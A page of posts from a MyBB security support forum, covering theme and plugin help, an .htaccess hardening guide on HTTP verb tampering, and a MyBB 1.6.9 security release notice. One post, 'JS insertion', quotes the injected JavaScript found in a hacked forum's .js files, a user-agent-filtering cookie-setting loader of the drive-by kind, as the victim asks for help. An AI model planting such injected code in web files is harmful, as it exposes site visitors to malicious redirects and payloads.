MyBB Security - All Forums

What Change I Have To Do To Get Like This

Mon, 06 May 2013 21:33:04 +0100

i`m Using The Cure Theme Template How To Make Look Like This User Profile In Posts

My Forum

Problem With Cloudfare Manger

Sun, 05 May 2013 22:39:10 +0100

I have installed the plugin but after activating the plugin i`ant got the cloudfare manger settings i cant see any option over the whole board setting except configuration settings

JS insertion

Fri, 12 Apr 2013 01:30:35 +0100

Hello
today i found that my forum has been hacked,and all .js files has the following code:

Code:

/*214afaae*/(function(){

function stripos (f_haystack, f_needle, f_offset) {

 var haystack = (f_haystack + '').toLowerCase();

 var needle = (f_needle + '').toLowerCase();

 var index = 0;

 if ((index = haystack.indexOf(needle, f_offset)) !== -1) {

  return index;

 }

 return false;

}

function zzz_check_ua(){

 var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','An​droid','Firefox/18.0','Firefox/18.0.1','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/19.0.2','Firefox/20.0','SymbianOS'];

 var blackUA = false;

 for (var i in blackList) {

  if (stripos(navigator.userAgent, blackList[i])) {

   blackUA = true;

   break;

  }

 }

 return blackUA;

}

function setCookie(name, value, expires) {

 var date = new Date( new Date().getTime() + expires*1000 );

 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();

}

function getCookie(name) {

 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));

 return matches ? decodeURIComponent(matches[1]) : undefined;

}

if (!zzz_check_ua()) {

 var cookie = getCookie('b1004dc22');

 if (cookie == undefined) {

  setCookie('b1004dc22', true, 432000);    

  document.write('');

 }

};

})();/*eaa795220*/п»ї/*

As i understand, this code just adds the cookie? Is it malicious?
And as i see now even if i delete all those js includes, the next time i open the forum it starts over, and the its again adeed to the .js files. So how can i find the source of the spreading?
Thanx in advance.

Theme: need some small changes!

Sun, 31 Mar 2013 05:27:48 +0100

Hi there :) I want to fix this theme: http://myskins.org/mydownloads.php?actio...down&did=6

and I want to customize this: http://postimg.org/image/uys1cvaq9/

as you can see the welcome message with AdminCP, UserCP, View your posts, View your Thread etc. And that box has just plain text :( I want to use buttons instead of just text!
Can you help me please? :)

Is there a plugin that creates random users?

Thu, 14 Feb 2013 02:01:28 +0000

Guys,

I was wondering if their was a plugin whereas it would randomly create users on the forum through the ACP. This plugin would be really cool in making your site look really, really big. Does anyone know of such a plugin?

-Money

How do you disable HTML is posts?

Mon, 04 Feb 2013 19:46:49 +0000

Hey guys, in a thread below me Nathan said to disable HTML in posts to help stop code injections. I'm up to date on my forum and only have two forum plugins so I feel pretty safe. I'm just not feeling 100% with the bad HTML filter. Could anyone tell me how to disable HTML in posts?

problem in creating new thread

Fri, 18 Jan 2013 07:26:59 +0000

hi
i am facing an error in creating new thread

file verification result
newthread.php Changed
i have uploaded new newthread.php but no effect

Can't Delete Reps / Move Multiple Threads

Thu, 17 Jan 2013 21:45:02 +0000

Hey all, I don't know why, but recently I've been getting two problems with my forum.

Problem one:
When I try to delete a reputation, I get the message: "Authorization code mismatch. Are you accessing this function correctly? Please go back and try again."
Can anyone help me fix this?

Problem two:

When I try to move multiple threads at once, or do anything to multiple threads at once for that matter, I get this error: "Sorry, but you did not select any threads to perform inline moderation on, or your previous moderation session has expired (Automatically after 1 hour of inactivity). Please select some threads and try again."

Can anyone help me with this please? It's really making it hard to remove the spam and rep abuse from my forum.

Issue in template

Wed, 16 Jan 2013 09:33:40 +0000

When I want add my cod to theme I see this error:

Quote:A potential security issue was found in the template. Please review your changes or contact the MyBB Group for support.

This is my code:

Code:

How fix it?

I Need working Forums Icons Plugin

Fri, 11 Jan 2013 00:18:54 +0000

Hey guys i'm having trouble finding a Forums Icons plugin. Could anyone link me to the correct plugin for this and have it updated so it works with the latest MyBB? Thanks.

-Zero

Reference Book 403

Sun, 06 Jan 2013 20:38:27 +0000

Just to let you know, this: http://www.mybbsecurity.net/docs/ = 403 Forbidden

GamerForumz

Wed, 02 Jan 2013 06:59:20 +0000

Hey guys I have just established enough of my site just to get it published. I have a few plugins that I checked manually for SQL injection vulnerabilities and found none. I also did about 15 different techniques in securing my forum. For the next few days, I'll be adding an achievements plugin, economy plugin, and a forum icons plugin. But that's only for the features. Besides that I'll be focusing on security. I have a cron job that automatically backs up the database every hour so that is a really nice pro. Anyways back to my site.

Basically as the title says, it's a designed gaming forum for just gaming in general. It's going to very professional and will have a lot of talk around it soon. Rules & guidelines are setup, now all I need to do is touch up and get some traffic! If you guys want to help me with my site your welcome to tell your friends, and at the least create an account there. Hopefully when it's completely setup my plans will go as intended to make one of the biggest gaming forums online. Happy New Years everyone and may 2013 be good to you.

http://www.gamerforumz.com

Password Protecting & Bruteforce

Wed, 02 Jan 2013 05:05:33 +0000

Alright guys I have a small question i'm not sure if i'm going to say correctly. I have added a password protect on my Admin panel so if someone finds my directory, they first have to enter a User - Pass. Then they need to brute my admin login. I found it really safe to put a password protect on the admin directory, but is there a way hackers can get past that Password Protect besides brute force? I haven't found any XSS or SQL injection vulnerabilities yet.

Cloudflare plugin - errors on overview page

Mon, 24 Dec 2012 00:18:53 +0000

I have the following errors on the overview page of cloudflare manager beta 3.1:

cloudflare.png (Size: 46.1 KB / Downloads: 38)
Any help is appreciated

Need help fixing site vulns

Sun, 23 Dec 2012 20:22:49 +0000

Hey all,
Recently, someone has been threatening to hack my forum, after our pentester posted a public thread revealing some exploits,

Here are here his threads:

Secure your MyBB config:

Code:

Go To Your Hosting

Create A Redirect Ex:

[code]www.example.com/inc/config.php

Code:

www.example.com

Then password protect:

Code:

www.example.com/inc/config.php

[/code]

Secure your htaccess:

Code:

Alert group:

Insecure configuration in .htaccess file

WebsiteDefender test:

During this test WebsiteDefender analyses your website’s .htaccess file for insecure configurations such as HTTP verb tampering.

Repercussions:

An insecure .htaccess file can compromise website security by enabling a hacker to bypass web authentication by using a technique called HTTP verb tampering — using a HTTP verb that is unspecified in Apache’s Limit directive in your .htacess file. HTTP verb tampering is mostly used to bypass any authentication/authorization mechanisms or to assist in other web attacks. Many developers, in their aim to secure or limit access to specific locations, unwillingly give more access than they initially thought. HTTP verbs can include the GET, POST, TRACE, TRACK, PUT, DELETE. These can be used by an attacker in order to execute an attack by exploiting any misconfigured rules in an access control or authorization file or policy, which in our case is the .htaccess file. A common scenario that allows HTTP verb tampering could be failure to block or properly control unused HTTP verbs. This possibly might allow any malicious user to bypass any security measures, such as Web Application Firewalls (WAFs), container-level URL and application-layer URL authentication/authorization, and gain control over the website which will eventually allow any malicious actions to be performed unobstructed.

A simple method to perform such an attack is to use the HEAD HTTP verb. Many developers try to limit the most common verbs GET and POST, however the HEAD verb — based on the Request For Comment (RFC) 2616 — is handled in exactly the same way as the GET verb without returning any data. Thus an attacker can send a HEAD request which when executed will confirm the vulnerability.

Fix:

There are two solutions to prevent HTTP Verb tampering attacks.

1. Limit HTTP Verbs

There are two ways how you can limit which HTTP Verbs should be handled by your server.

Limit directive – By using the limit Apache directive, you specify which HTTP verbs (methods) you want to allow.

LimitExcept directive – Using the LimitExcept directive, you are allowing all HTTP Verbs (methods) apart the ones specified. A  section should always be used in preference to a  section when restricting access, since a  section provides protection against arbitrary methods.

For this example below we will use the LimitExcept directive and allow all apart from PUT and DELETE. This configuration is ideal for a normal website which does not allow file uploads and deletion of files. For example:

[php]

                Require valid-user

                 [/php]

This will request authentication on any HTTP method except for PUT and DELETE.

2. Always ask for Authentication

The second method is to completely remove any type of HTTP method restrictions (Limit or LimitExcept) from access control and authorization rules, and adjust your .htaccess configuration to ALWAYS ask for authentication. Example of a .htaccess file follows:

[php]

AuthUserFile C:\xampp\htdocs\Acuart\.htpasswd

                AuthName "Authorization Required"

                AuthType Basic

                require valid-user [/php]

This method is preferred since the web server will request the visitor to authenticate when sending any type of HTTP request, irrelevant of the HTTP verb being used.

That's a direct copy-paste of the two threads he made about my site's security, and now that a hacker who dislikes my site knows about them, I could really do with some help on how to fix them. Thanks all for reading.

MyBB 1.6.9 Security Release

Sat, 15 Dec 2012 10:52:03 +0000

MyBB 1.6.9 is now available from the MyBB website and is a security release for the 1.6 series.

What's added/changed in this version?
It has come to our attention that there is an SQL injection vulnerability in all versions of MyBB, including MyBB 1.6.8. We advise all MyBB forum owners to upgrade their forum as soon as possible.

With thanks to frostschutz and StefanT for finding and reporting these issues.

Vulnerabilities fixed:

High Risk: An SQL vulnerability when editing a post
Medium Risk: CAPTCHA systems non effective, providing possible brute-force access

Bugs fixed:

An issue with the editor not working in Firefox 16 and above

We apologise for any inconvenience.

Upgrading from 1.6.8 and Other Versions
Before performing any upgrade please remember to backup your forum's files and database and store them safely. If you have edited core files, including language files, please make sure you make a changelog for these changes so you can make them again once the upgrade is complete.

To upgrade, follow the Upgrading process. The upgrade script is required. There are changes to 1 language file (messages.lang.php). There are changes to 3 templates (portal_welcome_guesttext, loginbox & codebuttons).

Quote:If you're using MyBB 1.6.8

Download and use the Changed Files Package

Follow the upgrading instructions

If you’re using MyBB 1.6.7 or below

Download and use the full 1.6.9 Release Package

Follow the upgrading instructions

Reporting MyBB Security Vulnerabilities
If you think you’ve found a vulnerability in MyBB, we advise you not to publicly post it on these forums or publicly release information about it elsewhere until we’ve had time to prepare and release a patch.

As always, you can send through security related messages on the MyBB website from the Contact Us page or in our Private Inquiries forum – where you can start a new thread that only you and the MyBB Team can see.

Thank you,

MyBB Team

Hacking usernames

Tue, 04 Dec 2012 20:21:03 +0000

Hi
My forum version is 1.6.8 (1608) and has been updated
But while some of the usernames will be hacked
Other users will enter a person's name
What would you do?
Grateful

indya forums

Wed, 28 Nov 2012 08:14:37 +0000

Forum Name: indya forums
Forum URL: http://indyaforums.com
Description:
A hangout place/general discussion forum for indians, have tried to keep everything very minimalistic starting from categories to the postbit so that focus remains only on the discussion and nothing else.
Thank you.

forum icon

Thu, 22 Nov 2012 04:57:40 +0000

hi admin
i have buy neonglow theme from audentio.com Mike Creuzer but i am unable to change forum icons and he is not giving support please solve my problem
regard
ssraiki

cache system for queries

Mon, 19 Nov 2012 11:17:53 +0000

I created several queries to my stats.php. I want to make my queries refresh only every 24 hours(cache system). Becuase now I have many queries to my database when somebody open stats.php

Anyone has an idea?